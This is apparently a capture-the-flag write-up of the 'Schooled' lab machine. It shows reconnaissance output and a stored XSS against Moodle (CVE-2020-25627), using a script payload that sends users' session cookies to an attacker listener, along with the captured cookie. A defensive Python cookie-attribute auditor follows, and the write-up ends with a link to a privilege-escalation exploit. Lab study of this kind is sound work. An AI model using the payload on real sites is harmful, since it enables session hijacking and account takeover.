Schooled

$ echo "10.10.10.234 schooled.htb" | sudo tee -a /etc/hosts
$ sudo nmap -p- -T4 -A 10.10.10.234
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 11:16 EDT
Nmap scan report for 10.10.10.234
Host is up (0.026s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey: 
|   2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
|   256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_  256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp    open  http    Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|     HY000
|   LDAPBindReq: 
|     *Parse error unserializing protobuf message"
|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000
$ dirb http://10.10.10.234
---- Scanning URL: http://10.10.10.234/ ----
 ==> DIRECTORY: http://10.10.10.234/css/
 ==> DIRECTORY: http://10.10.10.234/fonts/
 ==> DIRECTORY: http://10.10.10.234/images/
 http://10.10.10.234/index.html (CODE:200|SIZE:20750)
 ==> DIRECTORY: http://10.10.10.234/js/
 ---- Entering directory: http://10.10.10.234/css/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.
 (Use mode '-w' if you want to scan it anyway)
 ---- Entering directory: http://10.10.10.234/fonts/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.
 (Use mode '-w' if you want to scan it anyway)
 ---- Entering directory: http://10.10.10.234/images/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.
 (Use mode '-w' if you want to scan it anyway)
 ---- Entering directory: http://10.10.10.234/js/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.
 (Use mode '-w' if you want to scan it anyway)
$ nikto -h http://10.10.10.234
 Server: Apache/2.4.46 (FreeBSD) PHP/7.4.15
 The anti-clickjacking X-Frame-Options header is not present.
 The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 No CGI Directories found (use '-C all' to force check all possible dirs)
 Allowed HTTP Methods: OPTIONS, HEAD, GET, POST, TRACE
 OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
 OSVDB-3268: /css/: Directory indexing found.
 OSVDB-3092: /css/: This might be interesting...
 OSVDB-3268: /images/: Directory indexing found.
 7864 requests: 0 error(s) and 8 item(s) reported on remote host
$ whatweb schooled.htb
http://schooled.htb [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], Email[#,admissions@schooled.htb], HTML5, HTTPServer[FreeBSD][Apache/2.4.46 (FreeBSD) PHP/7.4.15], IP[10.10.10.234], PHP[7.4.15], Script, Title[Schooled - A new kind of educational institute], X-UA-Compatible[IE=edge]

Gathered from the site's pages (a contact address, staff names for username guessing, and the hint that the platform is Moodle):
admissions@schooled.htb
Jane Higgins, Scientific Research Lecturer
Lianne Carter, Manager & English Lecturer
Manuel Phillips, Mathematics Lecturer
Jamie Borham, Information Technology Lecturer
"All content will be delivered over Moodle."
$ gobuster -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt vhost -u http://schooled.htb -o subdomain_schooled.htb
Found: moodle.schooled.htb (Status: 200) [Size: 84]
$ ffuf -c -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u http://schooled.htb -H "Host: FUZZ.schooled.htb" -fw 5338
moodle                  [Status: 200, Size: 84, Words: 5, Lines: 2]
$ echo "10.10.10.234 moodle.schooled.htb" | sudo tee -a /etc/hosts

CVE-2020-25627: the MoodleNet profile field is vulnerable to stored XSS (https://moodle.org/mod/forum/discuss.php?d=410839).
Session hijack: the payload below goes into the MoodleNet profile field; whenever another user's browser renders the profile, it requests the "image" from our listener and leaks that user's MoodleSession cookie in the query string.
<script>new Image().src="http://10.10.14.149/bogus.php?output="+document.cookie;</script>

kali@kali:~/0.htb/machines/Schooled234$ nc -lnvp 80
listening on [any] 80 ...
listening on [any] 80 ...
connect to [10.10.14.149] from (UNKNOWN) [10.10.10.234] 55198
GET /bogus.php?output=MoodleSession=go8f0r3ct801atmtrd6aicpegd HTTP/1.1
Host: 10.10.14.149
User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://moodle.schooled.htb/moodle/user/profile.php?id=29
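The cookie arrived in the query string because the browser could read it from script, i.e. MoodleSession was issued without the HttpOnly attribute. The following is an added example, not code from the writeup or from Moodle, that audits Set-Cookie headers for the attributes that would have contained this: HttpOnly blocks document.cookie access, Secure and SameSite limit where the cookie travels. The header values are constructed; on Moodle itself HttpOnly is controlled by the "Only http cookies" setting ($CFG->cookiehttponly).

```python
import re

# Constructed sample headers (not captured from the box). The first mirrors the
# shape of the MoodleSession cookie seen above, with no HttpOnly, Secure or
# SameSite attribute; the second is the hardened form of the same cookie.
WEAK_HEADERS = [("Set-Cookie", "MoodleSession=SESSIONVALUE; path=/moodle/")]
HARDENED_HEADERS = [
    ("Set-Cookie", "MoodleSession=SESSIONVALUE; path=/moodle/; HttpOnly; Secure; SameSite=Lax")
]
SESSION_NAME = re.compile(r"sess", re.IGNORECASE)  # MoodleSession, PHPSESSID, ...


def parse_set_cookie(value):
    """Split one Set-Cookie value into (name, value, {attribute: value or True})."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    name, _, cookie_value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, attr_value = part.partition("=")
        attrs[key.strip().lower()] = attr_value.strip() or True
    return name.strip(), cookie_value, attrs


def audit_cookie(value, served_over_https=True):
    """Return the weaknesses of one Set-Cookie header as a list of strings."""
    _, _, attrs = parse_set_cookie(value)
    findings = []
    if "httponly" not in attrs:
        # The defect the writeup exploits: without HttpOnly the cookie is
        # exposed to document.cookie, so any stored XSS can exfiltrate it.
        findings.append("missing HttpOnly")
    if served_over_https and "secure" not in attrs:
        findings.append("missing Secure")
    samesite = attrs.get("samesite")
    if samesite in (None, True) or str(samesite).lower() == "none":
        findings.append("missing or permissive SameSite")
    return findings


def audit_session_cookies(headers, served_over_https=True):
    """Audit every Set-Cookie header whose cookie name looks like a session id."""
    report = {}
    for header, value in headers:
        if header.lower() == "set-cookie":
            name, _, _ = parse_set_cookie(value)
            if SESSION_NAME.search(name):
                report[name] = audit_cookie(value, served_over_https)
    return report
```

Schooled serves Moodle over plain HTTP only, so pass served_over_https=False there and the Secure finding is suppressed; the HttpOnly finding is the one that explains the capture above.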

Moodle privilege escalation to manager: CVE-2020-14321
https://github.com/HoangKien1020/CVE-2020-14321
https://vimeo.com/441698193